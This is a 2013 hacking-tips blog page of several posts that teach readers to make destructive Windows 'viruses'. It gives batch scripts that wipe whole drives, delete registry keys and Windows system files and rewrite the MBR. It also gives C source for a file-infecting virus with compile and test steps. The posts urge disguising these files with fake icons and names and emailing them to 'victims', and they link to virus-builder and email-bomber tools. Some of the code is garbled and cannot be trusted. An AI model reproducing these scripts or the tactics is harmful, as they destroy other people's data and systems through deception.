Les nouveautés et Tutoriels de Votre Codeur | SEO | Création de site web | Création de logiciel

seo How To Make Poison Virus In Notepad 2013

Seo Master present to you:
Friends, Here i share some tricks about make virus in Notepad.  This is a simple trick .
It can be used to annoy Friends or Enemy.


This Virus would ask to choose a number between 1 - 5 and then do a certain action :

1) Shutdown
2) Restart
3) Wipes out your hard drive (BEWARE).
4) Net send
5) Messages then shutdown.

If you want to make this simple virus follow these simple steps :


  • Open Notepad.

  • Copy and Paste the following Code into Notepad :




  • Save it as PoisonVirus.bat

Make sure ,Your file extension like .bat







Leave your comment……………………



2013, By: Seo Master

seo How To Make Dangerous Virus with Notepad. 2013

Seo Master present to you:



Hi followers,this is a special post, It contain “how to make a harmful virus with notepad”?.




USE THIS TRICK FOR ETHICAL USE ONLY



1. At first open Notepad,Then copy below code and paste it.
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Save it as Entertainer001.bat and the batch file is created . Without .bat extension it will not work on your computer.



OR


2. Open Notepad,Then copy below code and paste it.

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Save it as Entertainer.bat and the batch file is created . Without .bat extension it will not work on your computer.





Do not  use this on your computer.


.................................END.......................................

2013, By: Seo Master

seo Virus Creator Tool 2013

Seo Master present to you:



Friends, This article only about virus creation. If you are not expert in this field. Don’t worry, It is a simple method to create a virus. It include a binding software. Just download this software and follow instructions.



Turn off your Antivirus before its installation





Download Virus creator tool : Click here


Select given options and create message. After that you will select a icon like paint, word or other. At the end you will hit create virus option.


Now virus created.





























Entertainment always with you...................................

2013, By: Seo Master

seo How To Remove Google Malware Warning From Our Blogger / Website 2013

Seo Master present to you:

Friends, Now i sharing a valuable post to remove suspicious link and content from our blogger/ Website. My blogger also affected with some links, because Google shows my Blogger is harmful. I cant recognize, what problem affected in my site. I also search on Google Webmasters Tool. But it not shows any warning. Only Google Chrome shows some warning. Because of these reasons my website ranking decease every day. After some days I got a website to find and reveal what problem affected on my site. Now i share how to remove malware content or link from our blogger . Follow this post and enjoy with Master Hacks..

Google Chrome Shows Harful content (www.www.matrixar.com)

 

 

  • Paste your URL and hit submit button.

Redleg's BlogspotBlogger Tool online malware finding software(www.www.matrixar.com)

 

  • Wait 2-3 seconds. It will redirect  another page. It shows what problem affected on your Blogger/Website.

Find Problem affected page (www.www.matrixar.com)

 

  • Click on Located here link. Now shows  full script of our blog. Red line shows  content is harmful.

Problem finded (www.www.matrixar.com)

 

  • Find that code from our blogger/website. Please check Page elements OR Templates.

Now i find What problem affeced on my blog. I removed it(wwww.www.matrixar.com)

 

  • Remove it.  Now site is clean .enjoy….

 

 

 

Leave a comment below. about master hacks…..

2013, By: Seo Master

seo How to make a simple Trojan Virus 2013

Seo Master present to you:

Want to make fun with your friends with doing a simple hack on their computer…YES, Now let us learn how to make a simple Trojan Virus in the PC and believe it really doesn't harm the PC as it is just a simple hack but just running that file make your PC to shutdown. So, What are you waiting for…just follow the steps and have fun..

STEPS:

  • Right click on Desktop.

  • Go to NEW>Shortcut

  • Type in Location shutdown –s –t 50 –c “Trojan Virus Activated”

  • Click on Next.

  • Type the name whatever you want to give it such as Internet Explorer.

  • Click on Finish.

  • Congratulations your new hack is ready to work.

  • If you want it EXTREMELY convincing to the user just right click that file.

  • Go to Properties>Shortcut>Change Icon.

  • Choose an appropriate Icon so you can make the user to RUN that file.

Now by just Running that file the System will be forced to Shutdown. It is not harmful for your PC it is just to have fun. By deleting that file you can make your PC normal as before…I hope that you will try this hack and find this interesting.




2013, By: Seo Master

seo Virus 2013

Seo Master present to you:

What Is A Virus?

 

images (4)

 

A computer virus is a computer program that can copy itself and infect a computer. The term “virus” is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.(Source Wikipedia)

As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan is a program that appears harmless but hides malicious functions. Worms and Trojans, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious and go unnoticed.(Source Wikipedia)

 

  • Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!

  • Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.

 

@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:tmp.bat >null attrib +r +s +h c:tmp.bat echo for %%i in (*.bat) do copy c:tmp.bat+%%i %%i >>c:windowssystem32autoexec.NT
echo echo virus detected! >>c:windowssystem32autoexec.NT
echo pause >>c:windowssystem32autoexec.NT
echo NT core:infected!
echo echo shame on you! >>c:autoexec.bat
echo echo system hault-virus identified! >>c:autoexec.bat
echo chkdsk >>c:autoexec.bat
echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c “windows has shut down because the lsass service has incountered a write fault at 0×00000000000000000000000000000000000″

Code Details

@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost – nothing much)
shutdown.exe (shutdown)

  1. Read and understand the warnings!

  2. Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.

  3. Copy and Paste the Code of the “virus” into Notepad

  4. Click File -> Save as

  5. Decide for a location to save the fake-virus. You should chose a location where the user won’t find the file, so saving it on the desktop would be a bad idea!

  6. Change “.txt” to “All files” in the file type drop-down menu

  7. Chose a harmless filename. Replace the “.txt” at the with “.bat”

  8. Click on save and close Notepad.

Now We Have Completed Making The Virus And Now We Must Bind The Virus With Any Other File

To Create a Fake Virus

First of all open "Notepad" in your computer and type the following code without quotes.

"start virus.bat

virus.bat"

Now the file as virus.bat and send it to your friend.Now when he will be trying to run it,his computer will get crushed and he will have to restart his computer.

To Create a Shutdown Virus

 

To create this virus,you dont need to open notepad.For this just go to your desktop,i.e.,the main screen and right click and go to "New" and then click "Shortcut".

Now type the following code in the text box.

shutdown -s -t 200 -c "This is a Fake Virus"

And then click next and type "My Computer".Now you will see a shortcut on your desktop named as "My Computer".Now you just need to change the icon of it as same as that of original My Computer.So right click on the shortcut and click properties and then click "Change Icon" button.Now select the icon of the My Computer and click apply and then OK.Now place the My Computer shortcut on your desktop and replace the original one.

Now whenever your friend will try to open My Computer,then his computer will get shut down after 3 minutes.To stop the shutdown,go to start and then go to Run and type shutdown -a.

How To Create a Harmful Virus

 

1.To create a very harmful virus,open Notepad and type the following.

del "C:\windows\pchealth"

del "C:\windows\system\"

del "C:\windows\system32\restore\"
del "C:\winlogon.exe"

del "C:\windows\system32\logonui.exe"

del "C:\windows\system32\ntoskrni.exe"

del "C:\windows\system32\autoexec.nt"

 

After pasting , Save it as  " your fav name " .bat
it's like i have saved it with ,"  fifa 10.bat "
i saved it like
fifa 10.bat
cricket 08.bat
spiderman 03.bat
batman 08.bat
matrixtheneo 02.bat
you have to put " any name " and 2 digits then " .bat "
and save it to your desktop , ....dont DOUBLE CLICK IT
or else your system files willl be deleted !
the disadvantage is , you cannot send this file by attachment in any EMAIL and send it to your friends
destroy your friends CPU and Enjoy !

 

2.What this virus does is completely and permanently delete Windows or Linux depending. Please read the caution at the top.Onto the trick. Follow the directions carefully.

1- Write The Following In Notepad Exactly as it says Code: 01001011000111110010010101010101010000011111100000
2- Save the file as an EXE (Click File-->Save as...-->and erase what ever is there and type in something like funnystuff.exe).
3- To test it, create a textfile called "TEST.txt"(just leave it blank) and save it in 'My Documents' or something in your C: drive. Now in a NEW notepad type "erase C:TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd". Now run the file "Test.cmd" and go to C: and you'll see your Test.txt is gone. Now, the real work begins:
4- Go to Notpad and type "erase C:WINDOWS" (or C:LINUX if your targeted victim has linux) and save it again as funnypicture.cmd or something.
5- DON'T EVER run the file or you'll lose your WINDOWS map. So, that's the virus.
6- Send an email to your victim and attach the file "Funnypicture.cmd" or whatever you named it. When they open it, their Windows will be erased.

 

 

 

 

 

 

 





2013, By: Seo Master

seo How to Create a Computer Virus? 2013

Seo Master present to you:

 

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

 

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

 

 

 

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE



2013, By: Seo Master

seo Sonic Bat Virus Creator And Bat To Exe Converter 2013

Seo Master present to you:

Friends,This program creates batch (.bat) viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer. Try it and enjoy….

sonic bat virus creator and batch to exe convertor from masterhacksindia.blogspot

 

Download Sonic Bat Virus Creator And Bat To EXE Converter: Click here (Alternate Link) OR Click here OR Click here OR Click here

 

 

Are you happy now?………………………… Comment below if links are broken….

 

2013, By: Seo Master

seo Swiss Army Knife 3.0 (Multifunctional Program) - Port Scanner, Email Bomber, Facebook Freezer, IM Spammer And Batch Virus creator 2013

Seo Master present to you:

Friends, Swiss Army Knife is a multifunctional program which allows us to perform simple tasks of our computer like logoff, shutdown, opening Task Manager, internet explorer or firefox etc. It also has inbuilt hacking tools like Port Scanner, Email Bomber, Facebook Freezer, IM Spammer and also a Batch Virus creator.

Swiss Army Knife hacking software from masterhacksindia.blogspot

Download Swiss Army Knife 3.0: Click here (Alternate Link) OR Click here OR Click here OR Click here

 

 

Are you happy?????… comment below if links are broken…………….

 

2013, By: Seo Master
Powered by Blogger.